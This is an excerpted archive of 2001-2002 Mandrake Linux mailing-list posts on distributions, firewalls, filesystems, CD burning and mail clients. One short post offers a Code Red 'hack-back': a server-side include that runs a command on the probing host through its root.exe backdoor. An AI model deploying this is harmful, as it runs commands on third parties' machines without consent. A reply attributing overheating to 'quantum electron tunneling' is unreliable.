I don't think you will find current systems from either vendor for the
Sparc. Mandrake made a version of 7.1 (never released beyond Beta) for
the UltraSparc and for the Alpha.

The market never really materialized so there is no current distro for
Sparc from either, last I checked.

Of course, with Solaris running, you can probably find gcc and compile
the rpm utility and go from there... It should(TM) be possible to roll
 your own.

 Civileme

SuSE has SPARC version of their distibution version 7.3, which I use in
our ultrasparc servers, working rather well (kernel 2.4.14, reiserfs, ...).

Check out UltraLinux site (www.ultralinux.org), there you can find information
of distributions which support SPARC.
Gentoo Linux seems to be most resent at the moment.
There is also project called Aurora SPARC. Aurora is a project to port
the current Red Hat packages to the SPARC, so I guess that is closest
you can get.

Re: [expert] No such file or directory message from bash

2002-01-24 Thread Expert

If you wish to execute a programme or application,
you must invoke it by typing a ./ a dot and a slash
together right up against the file name of the
executable, lets say the file name was xcdroast
well, one would type ./xcdroastto get it to
run, this is for security purposes because you should
not put . in your path or else someone could bust
into your unix system. If you want, you can add a
certain directory to your path like /bin or /sbin .

If you wish to know what to type to put some
directory in your path just ask and i will
look it up real quick on my system.

hope this helps

Re: [expert] redhat vs mandrake

2002-01-13 Thread Expert

I have a dualboot system, Mandrake on the first partition
because the e mail, web and ftp server both work
out of the box, RedHat does not.

The only use I get from RedHat is that
the compiler seems to work when I want to
install and run wxGTKwindows libraries,
and audacity audio editing software,
everything else in RedHat is broken,
but on my RedHat it is KDE's Dcopserver
that I cannot seem to fix, I can't even log
into kde session, I have to use gnome, can't
even run any kde apps! Bugger. (scuse my french)

I can't get Mandrake's compiler to compile anything,
whether I stick with the install default or upgrade to
gcc3, but, I'm sticking with Mandrake because the
web, ftp, and e mail servers all work great straight
from the box. I will just boot into RedHat to use
my audio editor, but that is all,
so we share similar sentiments.

[expert] Interesting, mdk8.1 runs on IBM pc 520 server, but------

2001-12-14 Thread Expert

This you may find interesting, a budd and me got mdk8.1
to run on an old IBM PC 520 server, well sort of.

I am not sure if it is a hardware trouble or not,
but sometimes, it will say that the system
drive is present but not ready.

It also does not find the raid array,
which I believe is an Adaptec 7870 or
7078 or something like that.

The video is really wierd too, what should be
the red background of the root log in,
is a strange dirty yellow crosshatch pattern
for a few minutes, then it is red like it should be,
wierd.

Sorry if not enough info, I will try to provide some
more as I work with the old tank a little more.

No rush, just when ever :)

Many thanks for the info.

I found the file, copied it onto a 1.44 Mb disc,
its all I had formatted, does it require 2.88 drive
or is it backward compatible?

I searched the IBM site, but I could not find
anything that tells you how to make the file
work.

I copied the .exe file onto the disc but it would not
read the disc, hmmm sorry to be dumb, I just
missed something.

Thanks

Windows still slaughter's Linux in this area, I'm afraid. I have, however,
seen that there is some progress in this area with Demudi. But still, there

HEAR HEAR!!

Well spoken!

On Saturday 24 November 2001 03:17 pm, Jose M. Sanchez wrote:
No you are approaching this the wrong way.

The DVD version is touted as containing other packages available to
 the end user.

As a result many people purchase this package expecting ALL of those

This is what leaves the ripped off feeling.

It would have been far better NOT to have included these demo packages
or at least not have listed them the way your marketing people have as
an enticement to purchase the Prosuite.

What you are doing is effectively making everyone feel short changed.

That said, yes you can provide bundled in commercial packages at added
cost on additional cds provided the end user is fully cognizant of what
 they are getting.

A Game release version of Linux should not only be tailored to be
game friendly but ideally should include a full title or two, even if
this brings up the price. Eh, wait, that's exactly what you did!

Mandrake is in a unique position, in that it can negociate deals with
the producers to provide fully bundled in apps at a low cost. When you
list extra applications as included, this is what we expect. The
assumption is that the added cost is to pay for these apps.

As an end user, if I'm popping extra money for a pro version or the
like, the first thing I do is look to see what is included. I did this
when looking at the Pro-suite release...

Oooh it looked nice, all those extra apps listed in the matrix.

Well I get the DVD product only to find that there really ARE NO extra
apps, other than the few Mandrakized RPM's for the free apps already
 available on the internet.

Hmmm. Not a good buy IMHO.

If I'd have been told that I could get the 3CD set, but for 20.00 more
I'd get another CD with the Mandrakized RPM's, I'd have gone for the
latter and felt pretty good about it.

As it is, sorry Civilme, Mandrake's marketing people don't get it.

Remember I'm merely voicing my displeasure. This represents a minimum of
100 or so people who feel likewise but never bother posting messages
 about this.

Pointing to other releases is also a non-sequitor, who cares?

I'm only going by what is posted on Mandrake's web site which is
 misleading.

What exactly does not work? You cannot reach the internet? Your packets
source address is not translated by the NAT table? One thing that is
apparent from your script (but you may have put it elsewhere) is that it
does not enable IP Forwarding (echo 1 /proc/sys/net/ipv4/ip_forward).

[expert] iptables firewall

Machine details:

Linux Version 2.4.3-20mdk
434MHz Intel Celeron (Mendocino) Processor, 256M RAM
Network interface to Internet: eth0
Network interface to Intranet: eth1

Hi I am facing problem getting my iptables based firewall working.

If I use only the /etc/rc.d/rc.firewall.inet_sharing-2.4 rules which were generated by

mandrake's drakgw, NAT works properly. Here is what those rules do:

 begin rc.firewall.inet_sharing-2.4

#!/bin/sh

# Load the NAT module (this pulls in all the others).

modprobe iptable_nat

# Turn on IP forwarding

echo 1 /proc/sys/net/ipv4/ip_forward

# In the NAT table (-t nat), Append a rule (-A) after routing (POSTROUTING)

# which says to MASQUERADE the connection (-j MASQUERADE).

iptables -t nat -A POSTROUTING -s 192.168.0.0/24 -j MASQUERADE

# Allows forwarding specifically to our LAN

iptables -A FORWARD -s 192.168.0.0/24 -j ACCEPT

# Allow dhcp requests

iptables -A INPUT -i eth1 -p udp --sport bootpc --dport bootps -j ACCEPT

iptables -A INPUT -i eth1 -p tcp --sport bootpc --dport bootps -j ACCEPT

# Allow dns requests

iptables -A INPUT -i eth1 -p udp --dport domain -j ACCEPT

iptables -A INPUT -i eth1 -p tcp --dport domain -j ACCEPT

 end rc.firewall.inet_sharing-2.4

How ever if I use my own firewall with NAT enabled, it doesn't seem to work.
What am I doing wrong.
Purpose of my firewall is to keep only ssh, http, https smtp ports open to outside
world.
Keeping all the ports open to my intranet.
But when I use my firewall, NAT doesn't work!

Yep, I have ext2 and used the -f option, still did not
think it was good on boot up.

On Saturday 15 September 2001 08:36 am, so spoke Asheesh Laroia:
Do you know what file system you have?

 If it's ext2, use:

 e2fsck -f device

The -f makes sure it runs the check. Sometimes the fsck program thinks
the file system is clean on first check when it is not.

 For a ReiserFS partition, use:

 reiserfsck device

 Best of luck!

Oh well, nice to wish.

 1) Create a file called default.ida, in there add this:

 !--#exec cmd=lynx -source
 http://$REMOTE_ADDR/scripts/root.exe?/c+iisreset+/stop--

On one line, if it wraps in your mail client

 2) Then in your httpd.conf or similar... add this

 AddType text/html .ida
 AddHandler server-parsed .ida

Re: [expert] ext3 support in 8.1?

2001-08-29 Thread Expert

Is ext3 more stable or reiser?

On Wednesday 22 August 2001 01:23 pm, so spoke [EMAIL PROTECTED]:
I'm sure most on the list have already read the /. article about RH
shipping ext3 with their 7.2 release so I was just curious if Mandrake's
 going to do the same.

I realise reiserfs is already offered (and I use it on nearly all of my
machines), but what was probably one of the biggest reasons that made me
move over from RH to Mandrake was that one had a _choice_ in what
filesystem(s) they wanted to have on their box. It wasn't RH saying,
you're going to take ext2 and you're going to like it, but rather
Mandrake saying, you have all of these options available to you.

I simply wanted to see if ext3 would be yet another option available in
 the future to Mandrake users.

 Cheers,

 -Charlie

terribly unusable Mandrake is on the desktop? What a load of uninformed
 shit you're spreading.

Let me tell you just how usable this OS really is. I've got a 4 year old
grand daughter that hasn't been tainted by the O gawd! this isn't windows
so I'm lost and can't use it syndrome and has no trouble at all finding
her way around. And that includes logging on and supplying her own
password. simple as it may be. She KNOWS that under the K is where the
menu(s) are and she KNOWS that under amuzements is where her favorite
games are and she KNOWS that under Applications-Editors is where a few
text editors live AND how to find and start GIMP when she wants to draw me
 pictures.

Its not rocket science...its just different! so deal with it and get over
it. it wasn't meant to be windows and thank GOD it's never going to BE
 windows.

When you have it in your path, it sayus cannot launch realplay.

There is no reason for this to happen.

The path is clearly /usr/local/RealPlayer8/realplay installed from the

[expert] mdk 8, libsafe, rebuilding srpms

2001-06-19 Thread expert-mandrake

Hi!

Can somebody tell me the reason why all the srpms i rebuild
are dependent on libsafe?

I also don't understand why the other packages keep on looking
for libsafe even if it is already installed.

I already tried removing libsafe-2.0-2mdk and installing
libsafe-2.0-3mdk but it did not solve the problem.

 $ cat /etc/mandrake-release

Hi drakes,

I have installed 'drake 8.0 on my test machine.
i815 board with integrated video, sound, LAN adapter.

ATA100 20GB HDD.
Everything is fine except the AA fonts in KDE.
When I start Konqueror from an xterm I see a message that reads something
like this:
Extension RENDER not fount on display :0.0.
Is the AA feature video card specific? Which video cards do we have AA
feature
available for?

Re: [expert] MDK 8 and kernel useage

2001-04-24 Thread Expert User

Yes even I remember seeing 3-4 processes running at 99% cpu usage when I
was ripping some CDs with 'grip'. One of the process was oggenc, second
was kmon itself and third was
cdparanoia. But how is that possible? I have only one CPU.
I closed kmon and started top in an xterm and everything looked fine.
I'm pretty sure something was wrong with kmon.

Anyone know if thats from the 2.4.3 Kernel or something gaga with the various

[expert] X Mail Client

2001-03-25 Thread Expert User

I need a fast and robust mail client which can handle multiple IMAP/POP
email accounts with large number of folders and big volume of mail.

Mozilla mail is almost there, but Mozilla takes too much memory, crashes
sometimes and on my Celeron 433 system, it is rather sluggish.

KMail is better in speed and memory foot print but doesn't have IMAP
capability.

Do you have any other suggestions?

[expert] No Mail

2001-03-22 Thread Expert User

I have not received a single mail from this list in last two days.
Is there some problem?
I'm receiving other mails. The last mail I received from this list was
on Mar 21 at around 10.00am Pacific Time.

I checked my mail logs to see if my mail server was rejecting any mails
etc. No that is not the case.

If you you have answers you obviously have to reply to me directly!

Your harddisk may be bad

Lieven Van Acker wrote:

 Hi,

I am faced with a serious problem on a Mandrake 7.2 server application.

This server is used as a file- and printserver for a medium sized user

The station was set-up about 3 weeks ago and proved until last week to be
stable. Since last week the station has begun to ran into several kernel
panics a day, first with a lower frequency (say twice a day), now after a
 few minutes of uptime.

OK, so I expected some kind of hardware failure, and replaced the station
completely with another, keeping the harddisks in the original
 configuration.

This didn't solve the problem, so now I am thinking of a software failure.

After inspection of the system logs, I could not find any clue on the
 trigger of the crashes.

Can anyone please give me some advice on how to proceed now.

At this very moment, the server reboots spontaneously after a few minuts of
 uptime.

PS I looked at the available updates but none where applicable on my
 application.

Re: [expert] cd-rw in 2.2.17 error

2001-03-10 Thread Expert User

You can not mount them as a file system. You have to use some program like
cdrecord to burn an image on the CD-R(W) first and then you can mount it.
You create an image using mkisofs.

Re: [expert] cd-rw in 2.2.17 error

2001-03-10 Thread Expert User

If you have an iso file then you just need to use cdrecord.

BTW, do you have cdrecord installed?
If you have then:
1. first find where is your CD-RW drive:
cdrecord -scanbus
This will produce some output like this:
scsibus0:
   0,0,0 0) *
   0,1,0 1) *
   0,2,0 2) *
   0,3,0 3) *
   0,4,0 4) *
   0,5,0 5) *
   0,6,0 6) 'SAF ' 'CD-RW4224S ' '1.41' Removable CD-ROM
   0,7,0 7) *

Now you know your CD-RW is "0,6,0". So use that.

cdrecord dev=0,6,0 /home/eric/1-8.0-Traktopel-beta1-i586.iso

and that's it. I would suggest you to read the cdrecord man page before actually
burning a CD, otherwise you may end up burning a coaster.

If you don't see anything as the output of 'cdrecord -scanbus', then I would suggest
you to read
the CD-Writing Howto http://www.linuxdoc.org/HOWTO/CD-Writing-HOWTO.html.

Re: [expert] Web Mail System

2001-03-09 Thread Expert User

I have been using TWIG (http://twig.screwdriver.net/) for some time now.
Though it has much more than just Web Based Email (with IMAP/POP3
group/Calendar/Notes/forums etc) you can configure it to select just
what you want. It is pretty fast too! My server is a Celeron 433 machine
with TWIG+MySQL+APACHE+IMAP and it works wonderful. I have had no
problems or crashes since I installed it.

There are many others too: aeromail, bobomail, acmemail to name a few. A
search on Freshmeat/Sourceforge will show you more!

Hope that helps

That's due to an effect know as quantum electron tunneling as the chip
heats up. Replace your cpu fan with a larger unit e.g. a Chrome Orb.
Fit an exhaust fan card to suck the air out and install a large inlet
fan in the front. If possible mount a secondary fan 3.5" aimed at the
cpu area this should keep the system temp down a bit.
